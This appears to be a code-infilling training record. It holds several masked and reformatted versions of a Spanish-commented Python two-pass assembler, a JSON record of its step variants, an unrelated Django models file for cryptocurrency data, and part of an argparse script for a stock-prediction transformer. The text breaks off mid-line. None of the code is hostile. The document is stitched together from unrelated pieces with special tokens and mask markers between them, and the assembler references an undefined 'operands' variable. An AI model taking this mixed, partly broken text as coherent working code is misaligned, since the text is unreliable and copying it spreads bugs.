if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print('Error etiqueta invalida')
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
<|reserved_special_token_0|>
aux.leerArchivo()
aux.first_pass()
aux.Second_pass()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Ensambler(object):
def __init__(self, fileName):
self.fileName = fileName
self.fileLines = []
self.cl = 0
self.size = 0
self.code = ''
self.instruction = ''
self.num_ope = 0
self.operands = []
self.TS = {}
self.CO = []
self.x = 0
def leerArchivo(self):
file = open(self.fileName, 'r')
for line in file:
line = line.replace('\n', '')
line = line.replace('\t', '')
self.fileLines.append(line)
file.close()
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == 'JP':
self.x = self.TS[operands[0]]
print('l')
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = 'nn'
self.instruction = (self.instruction + ' ' + self.
operands[0])
code, size = mne.map_mnem.get(self.instruction, 'Error'
)('0000')
self.cl += size
else:
print(self.instruction)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + ' ' + 'nn'
code, size = mne.map_mnem.get(self.instruction, 'Error')(
str(self.x))
self.CO.append(code)
else:
print('Error')
else:
if self.num_ope == 2:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + ' ' + self.operands[0
]
code, size = mne.map_mnem.get(self.instruction, 'Error')()
self.CO.append(code)
print(self.CO)
def clean_line(self, line):
line = line.split(';')
self.instruction = line[0].upper().replace(',', '')
def get_label(self):
label = self.instruction.split(':')
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print('Error etiqueta invalida')
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
aux = Ensambler('1.txt')
aux.leerArchivo()
aux.first_pass()
aux.Second_pass()
<|reserved_special_token_1|>
#from tkinter import Tk, Text, INSERT
import mnemonicos as mne
class Ensambler(object):
def __init__(self, fileName):
#Nombre del archivo
self.fileName = fileName
#Lineas del Archivo
self.fileLines = []
#Contador de Localidades
self.cl = 0
#Tamaño
self.size = 0
#Opcode
self.code = ""
#Intruccion
self.instruction = ""
#Contador de operadores
self.num_ope = 0
#Operandos
self.operands = []
# Tabla de simbolos
self.TS = {}
# Codigo Objeto
self.CO = []
#Aux
self.x = 0
#self.window = Tk()
#self.window.geometry('400x50')
def leerArchivo(self):
file = open(self.fileName, "r")
for line in file:
line = line.replace("\n", "")
line = line.replace("\t", "")
self.fileLines.append(line)
file.close()
#Primera Pasada
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == "JP":
self.x = self.TS[operands[0]]
print("l")
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + " " + self.operands[0]+","+self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + " " + self.operands[0]+","+self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = "nn"
self.instruction = self.instruction + " " + self.operands[0]
code, size = mne.map_mnem.get(self.instruction,"Error")("0000")
self.cl += size
else:
#Valida si no es opcode valido
print(self.instruction)
#code, size = mne.map_mnem.get(self.instruction,"Error")()
#lst = "CL: " + str(self.cl) + " Code: " + code
#self.CO.append(code)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + " " + "nn"
code, size = mne.map_mnem.get(self.instruction,"Error")(str(self.x))
self.CO.append(code)
else:
print("Error")
else:
if self.num_ope == 2:
self.instruction = self.instruction + " " + self.operands[0]+","+self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + " " + self.operands[0]
code, size = mne.map_mnem.get(self.instruction,"Error")()
self.CO.append(code)
print(self.CO)
#Quitar Comentarios
def clean_line(self,line):
line = line.split(";")
self.instruction = line[0].upper().replace(",","")
# Obtener y guardar etiqueta si existe
def get_label(self):
label = self.instruction.split(":")
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print("Error etiqueta invalida")
#Quitar espacio al inicio
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
#Obtener los operandos y la instruccion
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
aux = Ensambler("1.txt")
aux.leerArchivo()
aux.first_pass()
aux.Second_pass()
|
flexible
|
{
"blob_id": "3bc009271c7dd34ad09bcef81214387b63dfac59",
"index": 2549,
"step-1": "<mask token>\n\n\nclass Ensambler(object):\n\n def __init__(self, fileName):\n self.fileName = fileName\n self.fileLines = []\n self.cl = 0\n self.size = 0\n self.code = ''\n self.instruction = ''\n self.num_ope = 0\n self.operands = []\n self.TS = {}\n self.CO = []\n self.x = 0\n\n def leerArchivo(self):\n file = open(self.fileName, 'r')\n for line in file:\n line = line.replace('\\n', '')\n line = line.replace('\\t', '')\n self.fileLines.append(line)\n file.close()\n\n def first_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n if self.instruction == 'JP':\n self.x = self.TS[operands[0]]\n print('l')\n print(self.x)\n if self.operands[0] in mne.v_jump:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.operands[0][1:-1].isnumeric():\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n self.operands[0] = 'nn'\n self.instruction = (self.instruction + ' ' + self.\n operands[0])\n code, size = mne.map_mnem.get(self.instruction, 'Error'\n )('0000')\n self.cl += size\n else:\n print(self.instruction)\n print(self.CO)\n print(self.cl)\n print(self.TS)\n\n def Second_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.instruction in mne.v_jump:\n if len(self.operands) == 2:\n aux = self.operands[1]\n else:\n aux = self.operands[0]\n if aux in self.TS.keys():\n self.x = self.TS[aux]\n self.instruction = self.instruction + ' ' + 'nn'\n code, size = mne.map_mnem.get(self.instruction, 'Error')(\n str(self.x))\n self.CO.append(code)\n else:\n print('Error')\n else:\n if self.num_ope == 2:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n self.instruction = self.instruction + ' ' + self.operands[0\n ]\n code, size = mne.map_mnem.get(self.instruction, 'Error')()\n self.CO.append(code)\n print(self.CO)\n <mask token>\n\n def get_label(self):\n label = self.instruction.split(':')\n if len(label) > 1:\n if label[0] in mne.v_ops or label[0] in mne.map_mnem:\n print('Error etiqueta invalida')\n self.TS[label[0].strip()] = self.cl\n del label[0]\n self.instruction = label[0]\n\n def get_operands(self):\n line = self.instruction.split()\n self.operands = [operand for operand in line]\n self.instruction = self.operands[0]\n del self.operands[0]\n self.num_ope = len(self.operands)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Ensambler(object):\n\n def __init__(self, fileName):\n self.fileName = fileName\n self.fileLines = []\n self.cl = 0\n self.size = 0\n self.code = ''\n self.instruction = ''\n self.num_ope = 0\n self.operands = []\n self.TS = {}\n self.CO = []\n self.x = 0\n\n def leerArchivo(self):\n file = open(self.fileName, 'r')\n for line in file:\n line = line.replace('\\n', '')\n line = line.replace('\\t', '')\n self.fileLines.append(line)\n file.close()\n\n def first_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n if self.instruction == 'JP':\n self.x = self.TS[operands[0]]\n print('l')\n print(self.x)\n if self.operands[0] in mne.v_jump:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.operands[0][1:-1].isnumeric():\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n self.operands[0] = 'nn'\n self.instruction = (self.instruction + ' ' + self.\n operands[0])\n code, size = mne.map_mnem.get(self.instruction, 'Error'\n )('0000')\n self.cl += size\n else:\n print(self.instruction)\n print(self.CO)\n print(self.cl)\n print(self.TS)\n\n def Second_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.instruction in mne.v_jump:\n if len(self.operands) == 2:\n aux = self.operands[1]\n else:\n aux = self.operands[0]\n if aux in self.TS.keys():\n self.x = self.TS[aux]\n self.instruction = self.instruction + ' ' + 'nn'\n code, size = mne.map_mnem.get(self.instruction, 'Error')(\n str(self.x))\n self.CO.append(code)\n else:\n print('Error')\n else:\n if self.num_ope == 2:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n self.instruction = self.instruction + ' ' + self.operands[0\n ]\n code, size = mne.map_mnem.get(self.instruction, 'Error')()\n self.CO.append(code)\n print(self.CO)\n\n def clean_line(self, line):\n line = line.split(';')\n self.instruction = line[0].upper().replace(',', '')\n\n def get_label(self):\n label = self.instruction.split(':')\n if len(label) > 1:\n if label[0] in mne.v_ops or label[0] in mne.map_mnem:\n print('Error etiqueta invalida')\n self.TS[label[0].strip()] = self.cl\n del label[0]\n self.instruction = label[0]\n\n def get_operands(self):\n line = self.instruction.split()\n self.operands = [operand for operand in line]\n self.instruction = self.operands[0]\n del self.operands[0]\n self.num_ope = len(self.operands)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Ensambler(object):\n\n def __init__(self, fileName):\n self.fileName = fileName\n self.fileLines = []\n self.cl = 0\n self.size = 0\n self.code = ''\n self.instruction = ''\n self.num_ope = 0\n self.operands = []\n self.TS = {}\n self.CO = []\n self.x = 0\n\n def leerArchivo(self):\n file = open(self.fileName, 'r')\n for line in file:\n line = line.replace('\\n', '')\n line = line.replace('\\t', '')\n self.fileLines.append(line)\n file.close()\n\n def first_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n if self.instruction == 'JP':\n self.x = self.TS[operands[0]]\n print('l')\n print(self.x)\n if self.operands[0] in mne.v_jump:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.operands[0][1:-1].isnumeric():\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n self.operands[0] = 'nn'\n self.instruction = (self.instruction + ' ' + self.\n operands[0])\n code, size = mne.map_mnem.get(self.instruction, 'Error'\n )('0000')\n self.cl += size\n else:\n print(self.instruction)\n print(self.CO)\n print(self.cl)\n print(self.TS)\n\n def Second_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.instruction in mne.v_jump:\n if len(self.operands) == 2:\n aux = self.operands[1]\n else:\n aux = self.operands[0]\n if aux in self.TS.keys():\n self.x = self.TS[aux]\n self.instruction = self.instruction + ' ' + 'nn'\n code, size = mne.map_mnem.get(self.instruction, 'Error')(\n str(self.x))\n self.CO.append(code)\n else:\n print('Error')\n else:\n if self.num_ope == 2:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n self.instruction = self.instruction + ' ' + self.operands[0\n ]\n code, size = mne.map_mnem.get(self.instruction, 'Error')()\n self.CO.append(code)\n print(self.CO)\n\n def clean_line(self, line):\n line = line.split(';')\n self.instruction = line[0].upper().replace(',', '')\n\n def get_label(self):\n label = self.instruction.split(':')\n if len(label) > 1:\n if label[0] in mne.v_ops or label[0] in mne.map_mnem:\n print('Error etiqueta invalida')\n self.TS[label[0].strip()] = self.cl\n del label[0]\n self.instruction = label[0]\n\n def get_operands(self):\n line = self.instruction.split()\n self.operands = [operand for operand in line]\n self.instruction = self.operands[0]\n del self.operands[0]\n self.num_ope = len(self.operands)\n\n\n<mask token>\naux.leerArchivo()\naux.first_pass()\naux.Second_pass()\n",
"step-4": "<mask token>\n\n\nclass Ensambler(object):\n\n def __init__(self, fileName):\n self.fileName = fileName\n self.fileLines = []\n self.cl = 0\n self.size = 0\n self.code = ''\n self.instruction = ''\n self.num_ope = 0\n self.operands = []\n self.TS = {}\n self.CO = []\n self.x = 0\n\n def leerArchivo(self):\n file = open(self.fileName, 'r')\n for line in file:\n line = line.replace('\\n', '')\n line = line.replace('\\t', '')\n self.fileLines.append(line)\n file.close()\n\n def first_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n if self.instruction == 'JP':\n self.x = self.TS[operands[0]]\n print('l')\n print(self.x)\n if self.operands[0] in mne.v_jump:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.operands[0][1:-1].isnumeric():\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n self.operands[0] = 'nn'\n self.instruction = (self.instruction + ' ' + self.\n operands[0])\n code, size = mne.map_mnem.get(self.instruction, 'Error'\n )('0000')\n self.cl += size\n else:\n print(self.instruction)\n print(self.CO)\n print(self.cl)\n print(self.TS)\n\n def Second_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.instruction in mne.v_jump:\n if len(self.operands) == 2:\n aux = self.operands[1]\n else:\n aux = self.operands[0]\n if aux in self.TS.keys():\n self.x = self.TS[aux]\n self.instruction = self.instruction + ' ' + 'nn'\n code, size = mne.map_mnem.get(self.instruction, 'Error')(\n str(self.x))\n self.CO.append(code)\n else:\n print('Error')\n else:\n if self.num_ope == 2:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n self.instruction = self.instruction + ' ' + self.operands[0\n ]\n code, size = mne.map_mnem.get(self.instruction, 'Error')()\n self.CO.append(code)\n print(self.CO)\n\n def clean_line(self, line):\n line = line.split(';')\n self.instruction = line[0].upper().replace(',', '')\n\n def get_label(self):\n label = self.instruction.split(':')\n if len(label) > 1:\n if label[0] in mne.v_ops or label[0] in mne.map_mnem:\n print('Error etiqueta invalida')\n self.TS[label[0].strip()] = self.cl\n del label[0]\n self.instruction = label[0]\n\n def get_operands(self):\n line = self.instruction.split()\n self.operands = [operand for operand in line]\n self.instruction = self.operands[0]\n del self.operands[0]\n self.num_ope = len(self.operands)\n\n\naux = Ensambler('1.txt')\naux.leerArchivo()\naux.first_pass()\naux.Second_pass()\n",
"step-5": "\n#from tkinter import Tk, Text, INSERT\nimport mnemonicos as mne\n\n\nclass Ensambler(object):\n\n\n\tdef __init__(self, fileName):\n\t\n\t\t#Nombre del archivo\n\t\tself.fileName = fileName\n\t\t#Lineas del Archivo\n\t\tself.fileLines = []\n\t\t#Contador de Localidades\n\t\tself.cl = 0\n\t\t#Tamaño\n\t\tself.size = 0\n\t\t#Opcode\n\t\tself.code = \"\"\n\t\t#Intruccion\n\t\tself.instruction = \"\"\n\t\t#Contador de operadores\n\t\tself.num_ope = 0\n\t\t#Operandos\n\t\tself.operands = []\n\t\t# Tabla de simbolos\n\t\tself.TS = {}\n\t\t# Codigo Objeto\n\t\tself.CO = []\n\t\t#Aux\n\t\tself.x = 0\n\n\t\t#self.window = Tk()\n\t\t#self.window.geometry('400x50')\n\n\tdef leerArchivo(self):\n\t\tfile = open(self.fileName, \"r\")\n\t\tfor line in file:\n\t\t\tline = line.replace(\"\\n\", \"\")\n\t\t\tline = line.replace(\"\\t\", \"\")\n\t\t\tself.fileLines.append(line)\n\t\tfile.close()\n\n\t#Primera Pasada\n\tdef first_pass(self):\n\t\tfor line in self.fileLines:\n\t\t\tself.clean_line(line)\n\t\t\tself.get_label()\n\t\t\tself.get_operands()\n\t\t\tif self.num_ope == 1:\n\t\t\t\tif self.instruction in mne.v_jump:\n\t\t\t\t\tif self.instruction == \"JP\":\n\t\t\t\t\t\tself.x = self.TS[operands[0]]\n\t\t\t\t\t\tprint(\"l\")\n\t\t\t\t\t\tprint(self.x)\n\n\n\t\t\t\tif self.operands[0] in mne.v_jump:\n\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]+\",\"+self.operands[1]\n\n\t\t\t\tif self.operands[0][1:-1].isnumeric():\n\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]+\",\"+self.operands[1]\n\n\n\t\t\t\tif self.num_ope == 1:\n\t\t\t\t\tif self.instruction in mne.v_jump:\n\t\t\t\t\t\tself.operands[0] = \"nn\"\n\t\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]\n\t\t\t\t\t\tcode, size = mne.map_mnem.get(self.instruction,\"Error\")(\"0000\")\n\t\t\t\t\t\tself.cl += size \n\t\t\telse:\n\t\t\t\t\n\t\t\t#Valida si no es opcode valido\n\t\t\t\tprint(self.instruction)\n\t\t\t#code, size = mne.map_mnem.get(self.instruction,\"Error\")()\n\t\t\t\n\t\t\t#lst = \"CL: \" + str(self.cl) + \" Code: \" + code\n\t\t\t#self.CO.append(code)\n\t\tprint(self.CO)\n\t\tprint(self.cl)\n\t\tprint(self.TS)\n\n\n\tdef Second_pass(self):\n\t\tfor line in self.fileLines:\n\t\t\tself.clean_line(line)\n\t\t\tself.get_label()\n\t\t\tself.get_operands()\n\t\t\t\n\t\t\tif self.instruction in mne.v_jump:\n\n\t\t\t\tif len(self.operands) == 2:\n\t\t\t\t\taux = self.operands[1]\n\t\t\t\telse:\n\t\t\t\t\taux = self.operands[0]\n\n\t\t\t\tif aux in self.TS.keys():\n\t\t\t\t\tself.x = self.TS[aux]\n\t\t\t\t\tself.instruction = self.instruction + \" \" + \"nn\"\n\t\t\t\t\tcode, size = mne.map_mnem.get(self.instruction,\"Error\")(str(self.x))\n\t\t\t\t\tself.CO.append(code)\n\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Error\")\n\t\t\telse:\n\t\t\t\tif self.num_ope == 2:\n\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]+\",\"+self.operands[1]\n\t\t\t\tif self.num_ope == 1:\n\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]\n\t\t\t\tcode, size = mne.map_mnem.get(self.instruction,\"Error\")()\n\t\t\t\tself.CO.append(code)\n\t\tprint(self.CO)\n\n\n\t#Quitar Comentarios\n\tdef clean_line(self,line):\n\t\tline = line.split(\";\")\n\t\tself.instruction = line[0].upper().replace(\",\",\"\")\n\n\t# Obtener y guardar etiqueta si existe\n\tdef get_label(self):\n\n\t\tlabel = self.instruction.split(\":\")\n\n\t\tif len(label) > 1:\n\n\t\t\tif label[0] in mne.v_ops or label[0] in mne.map_mnem:\n\t\t\t\tprint(\"Error etiqueta invalida\")\n\t\t\t#Quitar espacio al inicio\n\t\t\tself.TS[label[0].strip()] = self.cl\n\n\t\t\tdel label[0]\n\n\n\t\tself.instruction = label[0]\n\n\t#Obtener los operandos y la instruccion\n\tdef get_operands(self):\n\t\tline = self.instruction.split()\n\t\tself.operands = [operand for operand in line]\n\t\tself.instruction = self.operands[0]\n\t\tdel self.operands[0]\n\t\tself.num_ope = len(self.operands)\n\n\t\t\n\t\naux = Ensambler(\"1.txt\")\naux.leerArchivo()\naux.first_pass()\naux.Second_pass()\n\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
from django.db import models
class crontab(models.Model):
name = models.CharField(max_length=20)
class converter(models.Model):
name = models.CharField(max_length=20)
class MainTable(models.Model):
rank = models.IntegerField(null=True)
coinid = models.CharField(max_length=30,null=True)
symbol = models.CharField(max_length=10)
name = models.CharField(max_length=30)
thumbimg = models.CharField(max_length=30)
marketcap = models.FloatField(null=True)
totalvolume = models.FloatField(null=True)
price_change = models.FloatField(null=True)
pricechangepercentage = models.FloatField(null=True)
onehourchange = models.FloatField(null=True)
sevendaychange = models.FloatField(null=True)
circulating_supply = models.FloatField(null=True)
class Table(models.Model):
name = models.CharField(max_length=30)
coinid = models.CharField(max_length=30)
symbol = models.CharField(max_length=20)
img = models.CharField(max_length=50)
image = models.CharField(max_length=50)
class Price(models.Model):
price = models.FloatField(null=True)
class Marketdata(models.Model):
price_change_24h = models.FloatField(null=True)
price_change_percentage_24h = models.FloatField(null=True)
|
normal
|
{
"blob_id": "0054921928838d9aee63cf58f50a0a01ee12635d",
"index": 6049,
"step-1": "<mask token>\n\n\nclass Table(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)\n",
"step-2": "<mask token>\n\n\nclass Table(models.Model):\n name = models.CharField(max_length=30)\n coinid = models.CharField(max_length=30)\n symbol = models.CharField(max_length=20)\n img = models.CharField(max_length=50)\n image = models.CharField(max_length=50)\n\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)\n",
"step-3": "<mask token>\n\n\nclass converter(models.Model):\n name = models.CharField(max_length=20)\n\n\nclass MainTable(models.Model):\n rank = models.IntegerField(null=True)\n coinid = models.CharField(max_length=30, null=True)\n symbol = models.CharField(max_length=10)\n name = models.CharField(max_length=30)\n thumbimg = models.CharField(max_length=30)\n marketcap = models.FloatField(null=True)\n totalvolume = models.FloatField(null=True)\n price_change = models.FloatField(null=True)\n pricechangepercentage = models.FloatField(null=True)\n onehourchange = models.FloatField(null=True)\n sevendaychange = models.FloatField(null=True)\n circulating_supply = models.FloatField(null=True)\n\n\nclass Table(models.Model):\n name = models.CharField(max_length=30)\n coinid = models.CharField(max_length=30)\n symbol = models.CharField(max_length=20)\n img = models.CharField(max_length=50)\n image = models.CharField(max_length=50)\n\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)\n",
"step-4": "<mask token>\n\n\nclass crontab(models.Model):\n name = models.CharField(max_length=20)\n\n\nclass converter(models.Model):\n name = models.CharField(max_length=20)\n\n\nclass MainTable(models.Model):\n rank = models.IntegerField(null=True)\n coinid = models.CharField(max_length=30, null=True)\n symbol = models.CharField(max_length=10)\n name = models.CharField(max_length=30)\n thumbimg = models.CharField(max_length=30)\n marketcap = models.FloatField(null=True)\n totalvolume = models.FloatField(null=True)\n price_change = models.FloatField(null=True)\n pricechangepercentage = models.FloatField(null=True)\n onehourchange = models.FloatField(null=True)\n sevendaychange = models.FloatField(null=True)\n circulating_supply = models.FloatField(null=True)\n\n\nclass Table(models.Model):\n name = models.CharField(max_length=30)\n coinid = models.CharField(max_length=30)\n symbol = models.CharField(max_length=20)\n img = models.CharField(max_length=50)\n image = models.CharField(max_length=50)\n\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)\n",
"step-5": "from django.db import models\n\nclass crontab(models.Model):\n name = models.CharField(max_length=20)\n\n\nclass converter(models.Model):\n name = models.CharField(max_length=20)\n\nclass MainTable(models.Model):\n rank = models.IntegerField(null=True)\n coinid = models.CharField(max_length=30,null=True)\n symbol = models.CharField(max_length=10)\n name = models.CharField(max_length=30)\n thumbimg = models.CharField(max_length=30)\n marketcap = models.FloatField(null=True)\n totalvolume = models.FloatField(null=True)\n price_change = models.FloatField(null=True)\n pricechangepercentage = models.FloatField(null=True)\n onehourchange = models.FloatField(null=True)\n sevendaychange = models.FloatField(null=True)\n circulating_supply = models.FloatField(null=True)\n\nclass Table(models.Model):\n name = models.CharField(max_length=30)\n coinid = models.CharField(max_length=30)\n symbol = models.CharField(max_length=20)\n img = models.CharField(max_length=50)\n image = models.CharField(max_length=50)\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)",
"step-ids": [
5,
6,
10,
12,
14
]
}
|
[
5,
6,
10,
12,
14
] |
from argparse import ArgumentParser, Namespace
def parse_arguments() ->Namespace:
"""
Parse arguments
:return: Arguments
"""
parser = ArgumentParser(description=
'DLP project: Stock Prediction using Transformer')
parser.add_argument('-e', '--epochs', default=10, type=int, help=
'Number of epochs')
parser.add_argument('-w', '--warmup', default=2, type=int, help=
'Number of epochs for warmup')
parser.add_argument('-l', '--learning_rate', default=0.001, type=float,
help='Learning rate')
parser.add_argument('-b', '--batch_size', default=64, type=int, help=
'Batch size')
parser.add_argument('-s', '--seq_len', default=128, type=int, help=
'Sequence length (consecutive days)')
parser.add_argument('-ne', '--num_encoders', default=3, type=int, help=
'Number of transformer encoder in the network')
parser.add_argument('-a', '--attn_dim', default=96, type=int, help=
'Dimension of single attention output')
parser.add_argument('-nh', '--num_heads', default=12, type=int, help=
'Number of heads for multi-attention')
parser.add_argument('-d', '--dropout_rate', default=0.3, type=float,
help='Dropout rate')
parser.add_argument('-hs', '--hidden_size', default=256, type=int, help
='Hidden size between the linear layers in the encoder')
parser.add_argument('-loss', '--loss_function', default='l2', type=str,
choices=['l1', 'l2'], help='Loss function')
parser.add_argument('-i', '--inference_only', action='store_true', help
='Inference only or not')
parser.add_argument('-r', '--root_dir', default='archive', type=str,
help='Directory containing the downloaded data')
parser.add_argument('-v', '--verbosity', default=0, type=int, choices=[
0, 1, 2], help='Verbosity level')
return parser.parse_args()
|
normal
|
{
"blob_id": "81573b4a57f540733ff2faaf82bab78381b9dd46",
"index": 1194,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_arguments() ->Namespace:\n \"\"\"\n Parse arguments\n :return: Arguments\n \"\"\"\n parser = ArgumentParser(description=\n 'DLP project: Stock Prediction using Transformer')\n parser.add_argument('-e', '--epochs', default=10, type=int, help=\n 'Number of epochs')\n parser.add_argument('-w', '--warmup', default=2, type=int, help=\n 'Number of epochs for warmup')\n parser.add_argument('-l', '--learning_rate', default=0.001, type=float,\n help='Learning rate')\n parser.add_argument('-b', '--batch_size', default=64, type=int, help=\n 'Batch size')\n parser.add_argument('-s', '--seq_len', default=128, type=int, help=\n 'Sequence length (consecutive days)')\n parser.add_argument('-ne', '--num_encoders', default=3, type=int, help=\n 'Number of transformer encoder in the network')\n parser.add_argument('-a', '--attn_dim', default=96, type=int, help=\n 'Dimension of single attention output')\n parser.add_argument('-nh', '--num_heads', default=12, type=int, help=\n 'Number of heads for multi-attention')\n parser.add_argument('-d', '--dropout_rate', default=0.3, type=float,\n help='Dropout rate')\n parser.add_argument('-hs', '--hidden_size', default=256, type=int, help\n ='Hidden size between the linear layers in the encoder')\n parser.add_argument('-loss', '--loss_function', default='l2', type=str,\n choices=['l1', 'l2'], help='Loss function')\n parser.add_argument('-i', '--inference_only', action='store_true', help\n ='Inference only or not')\n parser.add_argument('-r', '--root_dir', default='archive', type=str,\n help='Directory containing the downloaded data')\n parser.add_argument('-v', '--verbosity', default=0, type=int, choices=[\n 0, 1, 2], help='Verbosity level')\n return parser.parse_args()\n",
"step-3": "from argparse import ArgumentParser, Namespace\n\n\ndef parse_arguments() ->Namespace:\n \"\"\"\n Parse arguments\n :return: Arguments\n \"\"\"\n parser = ArgumentParser(description=\n 'DLP project: Stock Prediction using Transformer')\n parser.add_argument('-e', '--epochs', default=10, type=int, help=\n 'Number of epochs')\n parser.add_argument('-w', '--warmup', default=2, type=int, help=\n 'Number of epochs for warmup')\n parser.add_argument('-l', '--learning_rate', default=0.001, type=float,\n help='Learning rate')\n parser.add_argument('-b', '--batch_size', default=64, type=int, help=\n 'Batch size')\n parser.add_argument('-s', '--seq_len', default=128, type=int, help=\n 'Sequence length (consecutive days)')\n parser.add_argument('-ne', '--num_encoders', default=3, type=int, help=\n 'Number of transformer encoder in the network')\n parser.add_argument('-a', '--attn_dim', default=96, type=int, help=\n 'Dimension of single attention output')\n parser.add_argument('-nh', '--num_heads', default=12, type=int, help=\n 'Number of heads for multi-attention')\n parser.add_argument('-d', '--dropout_rate', default=0.3, type=float,\n help='Dropout rate')\n parser.add_argument('-hs', '--hidden_size', default=256, type=int, help\n ='Hidden size between the linear layers in the encoder')\n parser.add_argument('-loss', '--loss_function', default='l2', type=str,\n choices=['l1', 'l2'], help='Loss function')\n 